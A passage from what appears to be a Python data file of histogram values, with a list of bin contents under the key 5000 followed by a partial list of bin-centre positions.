5000 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.511415670772774e-05, 0.0, 0.0, 0.0, 2.0611103580595476e-05, 0.0, 0.00014059299724787763, 0.00025144680536734053, 6.479237404181693e-05, 0.00018045122676399082, 0.00014285659700274717, 0.000202618820214788, 0.00038357618644584444, 0.0002532167877747989, 0.0, 0.0001649127820000293, 0.0007565034394209913, 0.0004960093334627375, 0.00020299881661146903, 0.0005995053745416768, 0.000480859904094521, 0.0004807691917087049, 0.00031837103571006687, 0.0005002156901471695, 0.0006028247964050345, 0.0006118668423150621, 0.0007189528137710243, 0.0002934746342358125, 0.0005123995128316648, 0.00046200398876682894, 0.0002077089005264198, 0.000306263636366874, 0.00031921461173155225, 0.0007173246001955316, 0.0002956196195566542, 0.0005154624386637192, 0.000777793378247366, 0.00032288268628104477, 0.0003036434250817211, 0.00039127561529588587, 0.00038691601245018515, 0.0005084188001340376, 0.00028597565148762703, 0.0008137203382327823, 0.0005177500993258021, 0.0010603027840981158, 0.00032501971275773794, 0.0007350652018229537, 0.0010892905538598767, 0.00061756217889608, 0.0010924862602539607, 0.0006753711665459149, 0.0007291036280770608, 0.000824751480597376, 0.00029414698755615714, 0.0005118033677487267, 0.001199512740118141, 0.0009086694718409405, 0.0007456778749226272, 0.001467859398171193, 0.0005191126288607235, 0.0006410130514607214, 0.0006681000402817493, 0.0008190012617937742, 0.0006693044991823081, 0.0008209601822446577, 0.0008169372477251771, 0.0010768353007878768, 0.0009607928333142013, 0.0011561684446775994, 0.0008838956488582244, 0.0008110906623762096, 0.0011141854496068597, 0.0011895231922757778, 0.00047534009229256203, 0.0012101088809469578, 0.001004251256736085, 0.0011497002090694651, 0.0009034825179533313, 0.0013626383160344755, 0.0007133892436908125, 0.0016070337084027539, 0.001612662547150809, 0.0008871422426882541, 0.0007999277535108098, 0.0008239129441528804, 0.0009376688572130804, 0.0011030363073907979, 0.0013562993885969084, 0.0016115135235971378, 0.0009533580437143796, 0.00041138386550553977, 0.001102539601766024, 0.0012873013108646292, 0.0017681740597346486, 0.0012052321683355004, 0.002067008806494274, 0.0014595590919525036, 0.0007087662307600116, 0.001405842117901863, 0.0012072890532464047, 0.001149491005166133, 0.002042817853611206, 0.001305554535805122, 0.0006032864093656477, 0.0015159998959078677, 0.001293021845330596, 0.0009299473648491446, 0.0012501215243312033, 0.0006213078137646104, 0.000914677508028349, 0.0011065633967010883, 0.0020610058098838556, 0.0010803037589219688, 0.0009266278200692749, 0.0011096514282307077, 0.0005129758068979236, 0.0017775755749838622, 0.00252372624826969, 0.0012938918484021499, 0.001819824684302965, 0.0008710662379238607, 0.0008687297794065351, 0.0013221433482573542, 0.0014024760492222217, 0.000656485044485412, 0.001428590276767709, 0.0021032180442493746, 0.0015080033163901968, 0.0017357566734565704, 0.0013209631039096485, 0.0014528048296210709, 0.0011878990964034352, 0.0011527833239386067, 0.0014141029679202177, 0.0011317938545256838, 0.0006694542114938583, 0.001955766659019882, 0.0009491742729390176, 0.0017791196522069278, 0.0011703269518556353, 0.001821149724301743, 0.0012504731884718809, 0.0015775417351089906, 0.0012563025040509199, 0.0026605448635498054, 0.0007139225169778903, 0.0011549081816806172, 0.0017684207531741241, 0.0015675086748213984, 0.0022748144115864676, 0.0017973183022161167, 0.001682874671271579, 0.001269759035029232, 0.001569271297602704, 0.0018131741635076149, 0.000967715614183512, 0.001981779480443014, 0.002482711220730525, 0.0024210248317113534, 0.002352670467752135, 0.00172083042974492, 0.0011708240262299449, 0.0021111594342531816, 0.0026293582403058425, 0.0017345868770123805, 0.002529848228063672, 0.0033764280832680026, 0.0023466350211825628, 0.0018699002566872054, 0.002080409410459651, 0.0018330602113927983, 0.0019253005723689465, 0.002935038822198301, 0.0035426114532520177, 0.0027759607641038363, 0.0027279746495061656, 0.0023898878667382166, 0.0028842445569687123, 0.0022604501421674343, 0.002450843148344333, 0.0025947651088498083, 0.0027823947060051377, 0.0021694149775909164, 0.002613269452224207, 0.0023205668873290553, 0.0028451831644704167, 0.0031203504597713525, 0.0032658750057595796, 0.0028644655693654338, 0.0033803328950195027, 0.0038968961739642106, 0.002394086694786292, 0.0026964999099582014, 0.003880287203204019, 0.004006091761514702, 0.002395798430131652, 0.00440871979220828, 0.005198491323086528, 0.0034943005932297857, 0.004980706863888511, 0.005485714269879127, 0.004301657543639124, 0.004083061343796215, 0.0048436244697737585, 0.0034435967945529895, 0.004345747696474154, 0.004367771877084638, 0.0038983092221855416, 0.00409077582991897, 0.004624943211704584, 0.004776293754526027, 0.004742839813302709, 0.006706413391662328, 0.00574167266435919, 0.0052338199869500475, 0.004694707673888846, 0.006924431883899091, 0.005946637914693334, 0.005118976631508661, 0.006085528164865788, 0.005655676830939434, 0.006556393297166188, 0.005815337021634475, 0.007210485157164012, 0.0075983172356486025, 0.007164543881659075, 0.00642914569900526, 0.006486654401616411, 0.007534059433199521, 0.00963764475198659, 0.008588286822861682, 0.00920161563416983, 0.007279965928038703, 0.00825113469725057, 0.008459098618810149, 0.009579195492226028, 0.008735202537932113, 0.009101868393059603, 0.010779717131074222, 0.01330076822437792, 0.011191664445870523, 0.012334497924000124, 0.014024028647310092, 0.01367861161543573, 0.015046081410805268, 0.016473110647871263, 0.014983999722283677, 0.01654923923537804, 0.01807869431018259, 0.018372962339773886, 0.019820674984138056, 0.01782385986428776, 0.018060872399282515, 0.019604184589977806, 0.019953338283815326, 0.019172930532817125, 0.018335721586650533, 0.017638698430692306, 0.016772019021621544, 0.01782804885901488, 0.017490225117582497, 0.016150026071219348, 0.01109037435670235, 0.010578189118080134, 0.009826184914662415, 0.008641835155457932, 0.006069083902231605, 0.00571110332783822, 0.005907298730878041, 0.0044861483447453995, 0.0038751942804480487, 0.004066008398594875, 0.0027458405645175168, 0.003368694422169384, 0.0030228988074382296, 0.002140421676586118, 0.0014501697454379727, 0.0008963698310730641, 0.0013295464868553497, 0.0012277269962702258, 0.00044640151986470757, 0.0010796921263585256, 0.0005073499488752833, 0.0012515735370868214, 0.0003493012243809824, 0.0004983666570579658, 0.0007578176627667178, 0.0006204403919398075, 0.0006317698526788942, 0.00019899991227007388, 0.0005331044612485606, 0.000475998064381009, 0.00015024999446717105, 0.00044550453661878163, 0.00020082817246875866, 0.00010235648209668799, 0.00020170633412379288, 0.00014981769709465696, 0.0004122654534583445, 0.0003017039254397252, 0.0, 0.0, 0.00019259488647820777, 0.0, 0.00010396936183731541, 9.941779412908304e-05, 0.0, 0.0, 0.0002921227062500465, 0.00010235648209668799, 0.0, 0.0, 0.0002142916328654318, 9.926882699888648e-05, 0.0, 8.557881610613288e-05, 0.0, 0.0, 5.768690466548556e-05, 0.0, 0.0, 0.0001032929061783846, 0.0, 0.00010215374667479705, 0.0001119449840896995, 0.0, 0.00010021016005877893, 0.0, 0.0, 9.941779412908304e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00011117674052547301, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.926882699888648e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
}
binxcenters = [0.0017857142857142857, 0.005357142857142857, 0.008928571428571428, 0.0125, 0.01607142857142857, 0.019642857142857142, 0.023214285714285715, 0.026785714285714284, 0.030357142857142857, 0.033928571428571426, 0.0375, 0.04107142857142857, 0.044642857142857144, 0.048214285714285716, 0.05178571428571428, 0.055357142857142855, 0.05892857142857143, 0.0625, 0.06607142857142856, 0.06964285714285713, 0.0732142857142857, 0.07678571428571428, 0.08035714285714285, 0.08392857142857142, 0.0875, 0.09107142857142857, 0.09464285714285714, 0.0982142857142857, 0.10178571428571427, 0.10535714285714284, 0.10892857142857142, 0.11249999999999999, 0.11607142857142856, 0.11964285714285713, 0.1232142857142857, 0.12678571428571428, 0.13035714285714284, 0.13392857142857142, 0.13749999999999998, 0.14107142857142857, 0.14464285714285713, 0.14821428571428572, 0.15178571428571427, 0.15535714285714283, 0.15892857142857142, 0.16249999999999998, 0.16607142857142856, 0.16964285714285712, 0.1732142857142857, 0.17678571428571427, 0.18035714285714285, 0.1839285714285714, 0.1875, 0.19107142857142856, 0.19464285714285712, 0.1982142857142857, 0.20178571428571426, 0.20535714285714285, 0.2089285714285714, 0.2125, 0.21607142857142855, 0.21964285714285714, 0.2232142857142857, 0.22678571428571428, 0.23035714285714284, 0.2339285714285714, 0.2375, 0.24107142857142855, 0.24464285714285713, 0.2482142857142857, 0.2517857142857143, 0.25535714285714284, 0.2589285714285714, 0.2625, 0.26607142857142857, 0.26964285714285713, 0.2732142857142857, 0.27678571428571425, 0.28035714285714286, 0.2839285714285714, 0.2875, 0.29107142857142854, 0.29464285714285715, 0.2982142857142857, 0.30178571428571427, 0.3053571428571428, 0.3089285714285714, 0.3125, 0.31607142857142856, 0.3196428571428571, 0.3232142857142857, 0.3267857142857143, 0.33035714285714285, 0.3339285714285714, 0.33749999999999997, 0.3410714285714286, 0.34464285714285714, 0.3482142857142857, 0.35178571428571426, 0.3553571428571428, 0.35892857142857143, 0.3625, 0.36607142857142855, 0.3696428571428571, 0.3732142857142857, 0.3767857142857143, 0.38035714285714284, 0.3839285714285714, 0.38749999999999996, 0.39107142857142857, 0.39464285714285713, 0.3982142857142857, 0.40178571428571425, 0.40535714285714286, 0.4089285714285714, 0.4125, 0.41607142857142854, 0.41964285714285715, 0.4232142857142857, 0.42678571428571427, 0.4303571428571428, 0.4339285714285714, 0.4375, 0.44107142857142856, 0.4446428571428571, 0.4482142857142857, 0.4517857142857143, 0.45535714285714285, 0.4589285714285714, 0.46249999999999997, 0.4660714285714285, 0.46964285714285714, 0.4732142857142857, 0.47678571428571426, 0.4803571428571428, 0.48392857142857143, 0.4875, 0.49107142857142855, 0.4946428571428571, 0.49821428571428567, 0.5017857142857143, 0.5053571428571428, 0.5089285714285714, 0.5125, 0.5160714285714285, 0.5196428571428571, 0.5232142857142857, 0.5267857142857143, 0.5303571428571429, 0.5339285714285714, 0.5375, 0.5410714285714285, 0.5446428571428571, 0.5482142857142857, 0.5517857142857142, 0.5553571428571429, 0.5589285714285714, 0.5625, 0.5660714285714286, 0.5696428571428571, 0.5732142857142857, 0.5767857142857142, 0.5803571428571428, 0.5839285714285714, 0.5875, 0.5910714285714286, 0.5946428571428571, 0.5982142857142857, 0.6017857142857143, 0.6053571428571428, 0.6089285714285714, 0.6124999999999999, 0.6160714285714285, 0.6196428571428572, 0.6232142857142857, 0.6267857142857143, 0.6303571428571428, 0.6339285714285714, 0.6375, 0.6410714285714285, 0.6446428571428571, 0.6482142857142857, 0.6517857142857143, 0.6553571428571429, 0.6589285714285714, 0.6625, 0.6660714285714285, 0.6696428571428571, 0.6732142857142857, 0.6767857142857142, 0.6803571428571429, 0.6839285714285714, 0.6875, 0.6910714285714286, 0.6946428571428571, 0.6982142857142857, 0.7017857142857142, 0.7053571428571428, 0.7089285714285714, 0.7125, 0.7160714285714286, 0.7196428571428571, 0.7232142857142857, 0.7267857142857143, 0.7303571428571428, 0.7339285714285714, 0.7374999999999999, 0.7410714285714285, 0.7446428571428572, 0.7482142857142857, 0.7517857142857143, 0.7553571428571428, 0.7589285714285714, 0.7625, 0.7660714285714285, 0.7696428571428571, 0.7732142857142856, 0.7767857142857143, 0.7803571428571429, 0.7839285714285714, 0.7875, 0.7910714285714285, 0.7946428571428571, 0.7982142857142857, 0.8017857142857142, 0.8053571428571428, 0.8089285714285714, 0.8125, 0.8160714285714286, 0.8196428571428571, 0.8232142857142857, 0.8267857142857142, 0.8303571428571428, 0.8339285714285714, 0.8375, 0.8410714285714286, 0.8446428571428571, 0.8482142857142857, 0.8517857142857143, 0.8553571428571428, 0.8589285714285714, 0.8624999999999999, 0.8660714285714285, 0.8696428571428572, 0.8732142857142857, 0.8767857142857143, 0.8803571428571428, 0.8839285714285714, 0.8875, 0.8910714285714285, 0.8946428571428571, 0.8982142857142856, 0.9017857142857143, 0.9053571428571429, 0.9089285714285714, 0.9125, 0.9160714285714285, 0.9196428571428571, 0.9232142857142857, 0.9267857142857142, 0.9303571428571428, 0.9339285714285714, 0.9375, 0.9410714285714286, 0.9446428571428571, 0.9482142857142857, 0.9517857142857142, 0.9553571428571428, 0.9589285714285714, 0.9624999999999999, 0.9660714285714286, 0.9696428571428571, 0.9732142857142857, 0.9767857142857143, 0.9803571428571428, 0.9839285714285714, 0.9874999999999999, 0.9910714285714285, 0.994642857142857, 0.9982142857142857, 1.0017857142857143, 1.0053571428571428, 1.0089285714285714, 1.0125, 1.0160714285714285, 1.019642857142857, 1.0232142857142856, 1.0267857142857142, 1.0303571428571427, 1.0339285714285713, 1.0374999999999999, 1.0410714285714284, 1.0446428571428572, 1.0482142857142858, 1.0517857142857143, 1.0553571428571429, 1.0589285714285714, 1.0625, 1.0660714285714286, 1.0696428571428571, 1.0732142857142857, 1.0767857142857142, 1.0803571428571428, 1.0839285714285714, 1.0875, 1.0910714285714285, 1.094642857142857, 1.0982142857142856, 1.1017857142857141, 1.105357142857143, 1.1089285714285715, 1.1125, 1.1160714285714286, 1.1196428571428572, 1.1232142857142857, 1.1267857142857143, 1.1303571428571428, 1.1339285714285714, 1.1375, 1.1410714285714285, 1.144642857142857, 1.1482142857142856, 1.1517857142857142, 1.1553571428571427, 1.1589285714285713, 1.1624999999999999, 1.1660714285714284, 1.1696428571428572, 1.1732142857142858, 1.1767857142857143, 1.1803571428571429, 1.1839285714285714, 1.1875, 1.1910714285714286, 1.1946428571428571, 1.1982142857142857, 1.2017857142857142, 1.2053571428571428, 1.2089285714285714, 1.2125, 1.2160714285714285, 1.219642857142857, 1.2232142857142856, 1.2267857142857141, 1.2303571428571427, 1.2339285714285715, 1.2375, 1.2410714285714286, 1.2446428571428572, 1.2482142857142857, 1.2517857142857143, 1.2553571428571428, 1.2589285714285714, 1.2625, 1.2660714285714285, 1.269642857142857, 1.2732142857142856, 1.2767857142857142, 1.2803571428571427, 1.2839285714285713, 1.2874999999999999, 1.2910714285714284, 1.2946428571428572, 1.2982142857142858, 1.3017857142857143, 1.3053571428571429, 1.3089285714285714, 1.3125, 1.3160714285714286, 1.3196428571428571, 1.3232142857142857, 1.3267857142857142, 1.3303571428571428, 1.3339285714285714, 1.3375, 1.3410714285714285, 1.344642857142857, 1.3482142857142856, 1.3517857142857141, 1.3553571428571427, 1.3589285714285715, 1.3625, 1.3660714285714286, 1.3696428571428572, 1.3732142857142857, 1.3767857142857143, 1.3803571428571428, 1.3839285714285714, 1.3875, 1.3910714285714285, 1.394642857142857, 1.3982142857142856, 1.4017857142857142, 1.4053571428571427, 1.4089285714285713, 1.4124999999999999, 1.4160714285714284, 1.419642857142857, 1.4232142857142858, 1.4267857142857143, 1.4303571428571429, 1.4339285714285714, 1.4375, 1.4410714285714286, 1.4446428571428571, 1.4482142857142857, 1.4517857142857142, 1.4553571428571428, 1.4589285714285714, 1.4625, 1.4660714285714285, 1.469642857142857, 1.4732142857142856, 1.4767857142857141, 1.4803571428571427, 1.4839285714285715, 1.4875, 1.4910714285714286, 1.4946428571428572, 1.4982142857142857, 1.5017857142857143, 1.5053571428571428, 1.5089285714285714, 1.5125, 1.5160714285714285, 1.519642857142857, 1.5232142857142856, 1.5267857142857142, 1.5303571428571427, 1.5339285714285713, 1.5374999999999999, 1.5410714285714284, 1.544642857142857, 1.5482142857142858, 1.5517857142857143, 1.5553571428571429, 1.5589285714285714, 1.5625, 1.5660714285714286, 1.5696428571428571, 1.5732142857142857, 1.5767857142857142, 1.5803571428571428, 1.5839285714285714, 1.5875, 1.5910714285714285, 1.594642857142857, 1.5982142857142856, 1.6017857142857141, 1.6053571428571427, 1.6089285714285713, 1.6125, 1.6160714285714286, 1.6196428571428572, 1.6232142857142857, 1.6267857142857143, 1.6303571428571428, 1.6339285714285714, 1.6375, 1.6410714285714285, 1.644642857142857, 1.6482142857142856, 1.6517857142857142, 1.6553571428571427, 1.6589285714285713, 1.6624999999999999, 1.6660714285714284, 1.669642857142857, 1.6732142857142858, 1.6767857142857143, 1.6803571428571429, 1.6839285714285714, 1.6875, 1.6910714285714286, 1.6946428571428571, 1.6982142857142857, 1.7017857142857142, 1.7053571428571428, 1.7089285714285714, 1.7125, 1.7160714285714285, 1.719642857142857, 1.7232142857142856, 1.7267857142857141, 1.7303571428571427, 1.7339285714285713, 1.7375, 1.7410714285714286, 1.7446428571428572, 1.7482142857142857, 1.7517857142857143, 1.7553571428571428, 1.7589285714285714, 1.7625, 1.7660714285714285, 1.769642857142857, 1.7732142857142856, 1.7767857142857142, 1.7803571428571427, 1.7839285714285713, 1.7874999999999999, 1.7910714285714284, 1.794642857142857, 1.7982142857142855, 1.8017857142857143, 1.8053571428571429, 1.8089285714285714, 1.8125, 1.8160714285714286, 1.8196428571428571, 1.8232142857142857, 1.8267857142857142, 1.8303571428571428, 1.8339285714285714, 1.8375, 1.8410714285714285, 1.844642857142857, 1.8482142857142856, 1.8517857142857141, 1.8553571428571427, 1.8589285714285713, 1.8625, 1.8660714285714286, 1.8696428571428572, 1.8732142857142857, 1.8767857142857143, 1.8803571428571428, 1.8839285714285714, 1.8875, 1.8910714285714285, 1.894642857142857, 1.8982142857142856, 1.9017857142857142, 1.9053571428571427, 1.9089285714285713, 1.9124999999999999, 1.9160714285714284, 1.919642857142857, 1.9232142857142855, 1.9267857142857143, 1.9303571428571429, 1.9339285714285714, 1.9375, 1.9410714285714286, 1.9446428571428571, 1.9482142857142857, 1.9517857142857142, 1.9553571428571428, 1.9589285714285714, 1.9625, 1.9660714285714285, 1.969642857142857, 1.9732142857142856, 1.9767857142857141, 1.9803571428571427, 1.9839285714285713, 1.9874999999999998, 1.9910714285714286, 1.9946428571428572, 1.9982142857142857, 2.0017857142857145, 2.005357142857143, 2.0089285714285716, 2.0125, 2.0160714285714287, 2.0196428571428573, 2.023214285714286, 2.0267857142857144, 2.030357142857143, 2.0339285714285715, 2.0375, 2.0410714285714286, 2.044642857142857, 2.0482142857142858, 2.0517857142857143, 2.055357142857143, 2.0589285714285714, 2.0625, 2.0660714285714286, 2.069642857142857, 2.0732142857142857, 2.0767857142857142, 2.080357142857143, 2.083928571428572, 2.0875000000000004, 2.091071428571429, 2.0946428571428575, 2.098214285714286, 2.1017857142857146, 2.105357142857143, 2.1089285714285717, 2.1125000000000003, 2.116071428571429, 2.1196428571428574, 2.123214285714286, 2.1267857142857145, 2.130357142857143, 2.1339285714285716, 2.1375, 2.1410714285714287, 2.1446428571428573, 2.148214285714286, 2.1517857142857144, 2.155357142857143, 2.1589285714285715, 2.1625, 2.1660714285714286, 2.169642857142857, 2.1732142857142858, 2.1767857142857143, 2.180357142857143, 2.1839285714285714, 2.1875, 2.1910714285714286, 2.194642857142857, 2.1982142857142857, 2.2017857142857142, 2.205357142857143, 2.208928571428572, 2.2125000000000004, 2.216071428571429, 2.2196428571428575, 2.223214285714286, 2.2267857142857146, 2.230357142857143, 2.2339285714285717, 2.2375000000000003, 2.241071428571429, 2.2446428571428574, 2.248214285714286, 2.2517857142857145, 2.255357142857143, 2.2589285714285716, 2.2625, 2.2660714285714287, 2.2696428571428573, 2.273214285714286, 2.2767857142857144, 2.280357142857143, 2.2839285714285715, 2.2875, 2.2910714285714286, 2.294642857142857, 2.2982142857142858, 2.3017857142857143, 2.305357142857143, 2.3089285714285714, 2.3125, 2.3160714285714286, 2.319642857142857, 2.3232142857142857, 2.3267857142857142, 2.330357142857143, 2.3339285714285714, 